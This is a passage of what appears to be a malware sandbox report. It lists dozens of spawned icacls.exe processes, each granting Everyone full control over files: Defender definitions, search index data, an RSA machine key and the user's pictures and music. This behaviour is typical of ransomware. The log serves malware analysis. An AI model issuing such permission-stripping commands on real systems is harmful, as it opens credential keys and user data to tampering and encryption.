  "icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\mpasdlta.vdm /grant Everyone:F /T /C /Q
  2⤵
  PID:6216
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\NonCritical_x64_15ac16619585aa27282df5e4c6acd0916524a313_cab_07985c13\DMI5BF4.tmp.log.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4748
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:7516
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:1812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:7428
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:3076
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:7528
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:7504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:7484
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:7588
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:2440
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma /grant Everyone:F /T /C /Q
  2⤵
  PID:7468
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\34e548a8-3268-4dde-bedf-c40f9b6c814a.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:7584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\DeviceMetadataStore\en-US\63921eef-8415-4368-9201-f0df4af5778f.devicemetadata-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:7676
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:7664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4C554097-2FB0-402F-B4E6-871551E5F5E1}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:2576
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{B16DFA11-8161-4746-8090-B3D178903CF7}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:3412
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:7600
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\User Account Pictures\Admin.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:7760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{73E16F2A-F71A-4C25-9888-31BA6C186998}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:7604
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000014.db /grant Everyone:F /T /C /Q
  2⤵
  PID:3220
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db /grant Everyone:F /T /C /Q
  2⤵
  PID:6276
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.chk /grant Everyone:F /T /C /Q
  2⤵
  PID:3312
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSS.log /grant Everyone:F /T /C /Q
  2⤵
  PID:7684
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00001.jrs /grant Everyone:F /T /C /Q
  2⤵
  PID:5456
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\MSSres00002.jrs /grant Everyone:F /T /C /Q
  2⤵
  PID:5360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Windows.edb /grant Everyone:F /T /C /Q
  2⤵
  PID:5472
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:7812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:7740
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:7784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:3088
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:3264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:3392
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:2664
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:7888
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0001.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:3388
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:3896
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:7820
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:7912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:7940
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.002 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3212
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:3428
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.000 /grant Everyone:F /T /C /Q
  2⤵
  PID:5752
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.001 /grant Everyone:F /T /C /Q
  2⤵
  PID:7920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\INDEX.002 /grant Everyone:F /T /C /Q
  2⤵
  PID:7840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.Crwl /grant Everyone:F /T /C /Q
  2⤵
  PID:7896
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.1.gthr /grant Everyone:F /T /C /Q
  2⤵
  PID:8048
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\RAC\StateData\RacMetaData.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8044
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\tokens.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3100
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3340
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\AssetLibrary.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\DocumentRepository.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3816
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySharePoints.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5768
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\MySite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2824
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointPortalSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:8096
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3880
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\OFFICE\SharePointTeamSite.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5652
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5744
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:7968
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_pref.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:8036
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_property.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:8016
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\print_queue.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_property.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:8108
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\scan_settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:2656
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3616
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8128
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3612
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6036
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8120
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\folder.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\netfol.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:5104
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\pictures.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1724
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3560
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ringtones.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:1572
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\settings.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3548
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\sync.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3456
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8152
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\wmp.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:3556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3888
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3524
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5968
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6052
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5428
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3184
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5364
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3844
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3628
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6096
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5268
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_9904da6a-19c3-4a6e-a0a9-89cb601578fd /grant Everyone:F /T /C /Q
  2⤵
  PID:3660
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Updater6\AdobeESDGlobalApps.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3828
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata /grant Everyone:F /T /C /Q
  2⤵
  PID:7432
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Indexed Locations.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:3904
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Searches\Everywhere.search-ms /grant Everyone:F /T /C /Q
  2⤵
  PID:5524
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\deployment.properties /grant Everyone:F /T /C /Q
  2⤵
  PID:2900
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\BlockReceive.dib /grant Everyone:F /T /C /Q
  2⤵
  PID:4044
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CompareFormat.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:6128
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\CloseSkip.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:5632
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DenyRemove.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:4060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DisableCompare.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:2932
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\DisableDeny.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:5536
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\EnterRestart.emf /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6456
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\GetApprove.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:1920
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\JoinRestart.dwg /grant Everyone:F /T /C /Q
  2⤵
  PID:2740
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\LimitShow.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:2704
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\GroupResume.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:5144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\NewRepair.dxf /grant Everyone:F /T /C /Q
  2⤵
  PID:5128
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\OutEdit.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:2756
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ProtectSelect.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:2884
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ReceiveClose.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:3284
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PopWait.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:924
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\PingImport.tif /grant Everyone:F /T /C /Q
  2⤵
  PID:6320
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\OutSend.crw /grant Everyone:F /T /C /Q
  2⤵
  PID:6184
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RestartSwitch.eps /grant Everyone:F /T /C /Q
  2⤵
  PID:2388
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\RevokeOut.tiff /grant Everyone:F /T /C /Q
  2⤵
  PID:3332
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SendCheckpoint.raw /grant Everyone:F /T /C /Q
  2⤵
  PID:3208
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\ShowOpen.raw /grant Everyone:F /T /C /Q
  2⤵
  PID:4360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SkipDebug.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6236
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SplitLock.dwg /grant Everyone:F /T /C /Q
  2⤵
  PID:3436
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\StopEnter.gif /grant Everyone:F /T /C /Q
  2⤵
  PID:4496
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\StopSync.crw /grant Everyone:F /T /C /Q
  2⤵
  PID:6484
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SubmitReceive.raw /grant Everyone:F /T /C /Q
  2⤵
  PID:4636
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SuspendConvertTo.emz /grant Everyone:F /T /C /Q
  2⤵
  PID:4144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\SwitchMerge.svgz /grant Everyone:F /T /C /Q
  2⤵
  PID:6068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UninstallBlock.svgz /grant Everyone:F /T /C /Q
  2⤵
  PID:5468
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\UnregisterEnter.svg /grant Everyone:F /T /C /Q
  2⤵
  PID:4376
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\Wallpaper.jpg /grant Everyone:F /T /C /Q
  2⤵
  PID:4812
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Pictures\WatchExport.eps /grant Everyone:F /T /C /Q
  2⤵
  PID:2636
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\AddSkip.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4776
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ApproveRestore.xlsb /grant Everyone:F /T /C /Q
  2⤵
  PID:3204
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\AssertEnable.aiff /grant Everyone:F /T /C /Q
  2⤵
  PID:2568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\AssertUnblock.odt /grant Everyone:F /T /C /Q
  2⤵
  PID:4680
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ClearPop.ico /grant Everyone:F /T /C /Q
  2⤵
  PID:6100
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConnectConvertFrom.wmf /grant Everyone:F /T /C /Q
  2⤵
  PID:984
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ConnectRename.vstm /grant Everyone:F /T /C /Q
  2⤵
  PID:6016
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\DisableRevoke.rm /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\FindPublish.vst /grant Everyone:F /T /C /Q
  2⤵
  PID:2436
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\FormatAssert.crw /grant Everyone:F /T /C /Q
  2⤵
  PID:1716
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\NewRedo.sql /grant Everyone:F /T /C /Q
  2⤵
  PID:5556
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\OpenSubmit.vsdm /grant Everyone:F /T /C /Q
  2⤵
  PID:4736
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\ProtectFind.emf /grant Everyone:F /T /C /Q
  2⤵
  PID:4480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RenameUninstall.docm /grant Everyone:F /T /C /Q
  2⤵
  PID:2252
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RequestMeasure.php /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4596
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\RestartExport.mid /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2980
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SaveRestore.tmp /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4712
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SaveUse.php /grant Everyone:F /T /C /Q
  2⤵
  PID:3488
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SearchSkip.pub /grant Everyone:F /T /C /Q
  2⤵
  PID:4724
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Users\Admin\Music\SearchWrite.wpl /grant Everyone:F /T /C /Q
  2⤵
  PID:2112
- C:\Windows\system32\icacls.exe
